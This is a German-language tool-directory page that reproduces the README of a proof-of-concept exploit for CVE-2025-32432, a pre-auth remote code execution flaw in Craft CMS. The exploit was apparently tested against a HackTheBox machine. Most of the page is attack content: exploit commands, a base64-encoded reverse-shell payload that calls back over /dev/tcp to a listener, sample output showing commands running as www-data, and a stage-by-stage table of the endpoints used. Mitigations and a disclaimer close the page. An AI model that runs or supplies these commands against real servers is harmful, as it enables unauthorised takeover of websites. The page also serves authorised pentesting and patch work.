Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-32432 — Exploit, POC für CVE-2025-32432, CraftCMS2Shell | Kitploit
Tools/GitHubGitHub/c0gnit00/cve-2025-32432
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubc0gnit00/cve-2025-32432

CVE-2025-32432

Exploit, POC für CVE-2025-32432, CraftCMS2Shell

Repository anzeigen
32vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-32432 Craft CMS Pre-Auth RCE PoC

Kritische vorauthentifizierte Remote Code Execution in Craft CMS

Betroffen: Craft CMS 3.x, 4.x und 5.x (bis 5.6.16)

Info: Dieser Exploit wurde gegen die HackTheBox-Maschine Orion getestet

Übersicht

Dieses Repository enthält einen Proof-of-Concept-Exploit für CVE-2025-32432, eine kritische vorauthentifizierte Remote Code Execution-Schwachstelle in Craft CMS. Die Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, beliebigen PHP-Code auf dem Server auszuführen, indem der Mechanismus zur Anbindung von Yii2-Verhalten und die PHP-Objektinstanziierung mittels der __class-Override-Technik ausgenutzt werden.

CVSS-Score: 10.0 (Kritisch)

Funktionen

  • Pre-Auth-Ausnutzung — Keine Anmeldedaten erforderlich
  • Universelle Kompatibilität — Funktioniert mit Craft CMS 3.x, 4.x und 5.x
  • Automatische Asset-ID-Erkennung — Erzwingt gültige Asset-IDs automatisch per Brute-Force
  • CSRF-Token-Extraktion — Behandelt automatisch den CSRF-Schutz von Craft CMS
  • Session-Pfad-Fallback — Wiederholt automatisch alternative PHP-Session-Pfade, falls der erste fehlschlägt

Voraussetzungen

root@kitploit:~
Tool herunterladen
pip install requests urllib3

Schnellstart

Basis-Befehlsausführung

root@kitploit:~
python3 exploit.py -u http://target.com -c "id"

Reverse Shell

root@kitploit:~
# Start listener on your machine
penelope -p 4444

# base64 encode the payload
echo 'exec bash -i >& /dev/tcp/10.10.14.31/4444 0>&1' | base64


# Run exploit
python3 exploit.py -u http://orion.htb -c "echo 'ZXhlYyBiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMxLzQ0NDQgMD4mMQo=' | base64 -d | bash"

Asset-ID-Brute-Force überspringen (falls bekannt)

root@kitploit:~
python3 exploit.py -u http://target.com -c "whoami" -a 11

Alternativen Session-Pfad verwenden

root@kitploit:~
python3 exploit.py -u http://target.com -c "id" \
  -s "/tmp/sess_{}"

Verwendung

root@kitploit:~
Verwendung: exploit.py [-h] -u URL -c BEFEHL [-a ASSET_ID] [-m MAX_ASSET]
                                [-s SESSION_PATH] [-q]

CVE-2025-32432 Craft CMS Pre-Auth RCE Exploit v2

Optionen:
  -h, --help            Zeigt diese Hilfemeldung an und beendet das Programm
  -u, --url URL         Ziel-URL (z.B. http://target.com)
  -c, --command BEFEHL  Auszuführender Befehl
  -a, --asset-id ASSET_ID
                        Bekannte gültige Asset-ID (überspringt Brute-Force)
  -m, --max-asset MAX_ASSET
                        Maximale Asset-ID für Brute-Force (Standard: 300)
  -s, --session-path SESSION_PATH
                        Vorlage für den Session-Dateipfad (Standard: /var/lib/php/sessions/sess_{})
  -q, --quiet           Unterdrückt ausführliche Ausgaben

Beispielausgabe

root@kitploit:~
$ python3 exploit.py -u http://orion.htb -c "id"

╔══════════════════════════════════════════════════════════════╗
║  CVE-2025-32432 Craft CMS Pre-Auth RCE PoC v2              ║
║  Target: http://orion.htb                                  ║
║  Command: id                                                  ║
╚══════════════════════════════════════════════════════════════╝

[+] Stage 1: Getting session cookie and CSRF token...
[✓] Session ID: q6458g6g8njeimu59n9l65cu1e
[✓] CSRF Token: ofuxX9FLAA7gSDxLqxYtJGLZVHpPCm...
[+] Stage 2: Poisoning session file with PHP code...
[+] Poison request returned: 200
[✓] Session file poisoned
[+] Stage 3: Brute-forcing asset ID (1-300)...
[✓] Valid asset ID found: 1 (HTTP 200)
[+] Stage 4: Triggering RCE via PhpManager gadget chain...
[+] Target session file: /var/lib/php/sessions/sess_q6458g6g8njeimu59n9l65cu1e
[+] Trigger request returned: 200
[✓] COMMAND OUTPUT:
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================

Exploit-Phasen

PhaseAktionEndpunktAuth
1Session-Cookie und CSRF-Token extrahierenGET /admin/loginNein
2PHP-Payload in Session-Datei injizierenGET /index.php?p=admin/dashboard&a=<PHP>Nein
3Gültige Asset-ID per Brute-Force ermittelnPOST /index.php?p=admin/actions/assets/generate-transformNein
4RCE über PhpManager-Gadget auslösenPOST /index.php?p=admin/actions/assets/generate-transform&cmd=<CMD>Nein

Betroffene Versionen

ZweigBetroffenBehoben
3.x3.0.0-RC1 – 3.9.143.9.15+
4.x4.0.0-RC1 – 4.14.144.14.15+
5.x5.0.0-RC1 – 5.6.165.6.17+

Gegenmaßnahmen

  1. Sofort aktualisieren auf die neueste gepatchte Version
  2. Protokolle überwachen auf:
    • Mehrere POST-Anfragen an /admin/actions/assets/generate-transform
    • GET-Anfragen an Admin-Seiten mit a=-Parameter, der PHP-Code enthält
    • Vorhandensein von as-Feldern in POST-Request-Bodies
  3. WAF-Regeln aktivieren, um verdächtige Muster zu blockieren

Danksagungen

  • Ursprüngliche Entdeckung: Orange Cyberdefense / SensePost
  • Blogbeitrag: Untersuchung einer im Feld aktiven Kampagne mit RCE in CraftCMS
  • PoC-Autor: Basierend auf SensePost-Forschung, angepasst für HTB/Penetrationstests

Haftungsausschluss

Dieses Tool ist nur für autorisierte Sicherheitstests und Forschungszwecke bestimmt. Unautorisierter Zugriff auf Computersysteme ist illegal. Holen Sie vor dem Testen stets die entsprechende Genehmigung ein.

Lizenz

MIT-Lizenz – Siehe LICENSE-Datei für Details.